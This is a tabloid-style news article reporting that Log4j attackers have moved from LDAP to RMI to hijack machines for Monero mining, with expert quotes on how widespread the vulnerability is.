Connect with us

Technology

Warning Log4j attackers are switching tactics to make money as experts say it could affect millions of devices for YEARS

EXPERTS warn that Apache Log4j threat actors are switching up their method to secure resources for Monero mining.

Some of the attackers exploiting the Apache Log4j vulnerability, which experts predict could last for years, have moved from using LDAP to RMI in an attempt to maximize their chances of success.

Apache Log4j attackers are switching up their tactics

Up until recently, most of the attacks on the Java-based logging utility have been through a service called LDAP, or Lightweight Directory Access Protocol.

Now hackers have found that by switching to RMI (Remote Method Invocation) they can sometimes avoid additional security checkpoints.

Furthermore, as some JVM (Java Virtual Machine) versions are built with less-strict features, RMI can sometimes be an easier road to achieving RCE (remote code execution) than LDAP.

Juniper Labs has found that some of the threat actors are actually using both LDAP and RMI to attack Log4j’s vulnerability in the hopes of increasing their chances of success.

Some of the attackers appear to have one goal in mind: Hijack resources to mine in Monero, an unusual type of cryptocurrency.

Threat actors have described the activity as something that “ain’t going to harm anyone else,” according to Juniper Labs’ reports.


The cybersecurity world has been on high alert ever since the vulnerability, which puts systems running Apache Log4j version 2.14.1 or below at risk of being compromised, was discovered last week.

“As soon as I saw how you could exploit it, it was horrifying,” Peter Membrey, chief architect of ExpressVPN said.

“Like one of those disaster movies where there’s a nuclear power plant, they find it’s going to melt down, but they can’t stop it. You know what’s coming, but there are very limited things you can do.”

Experts have been desperately trying to identify vulnerable programs as well as prevent exploits wherever possible, but the list of the affected software, as compiled by the Cybersecurity and Infrastructure Security Agency (CISA), is hundreds long.

Meanwhile, the number of affected applications, experts believe, is undoubtedly in the thousands.

“I ran queries in our database to see every customer who was using Log4j in any of their applications, and the answer was: every single one of them that has any applications written in Java,” Jeremy Katz, co-founder of Tidelift, said.

The Java-based logging utility has been the victim of thousands of attacks daily, as of late.

In other news, a NASA spacecraft has officially touched the sun, plunging through the unexplored solar atmosphere known as the corona.

Samsung is reportedly killing off its beloved Note smartphone after more than a decade.

Apple has announced that it will let customers fix their own iPhones for the first time starting next year.

We pay for your stories!

Do you have a story for The US Sun team?

Email us at exclusive@the-sun.com or call 212 416 4552.

Like us on Facebook at www.facebook.com/TheSunUS and follow us from our main Twitter account at @TheSunUS

Exit mobile version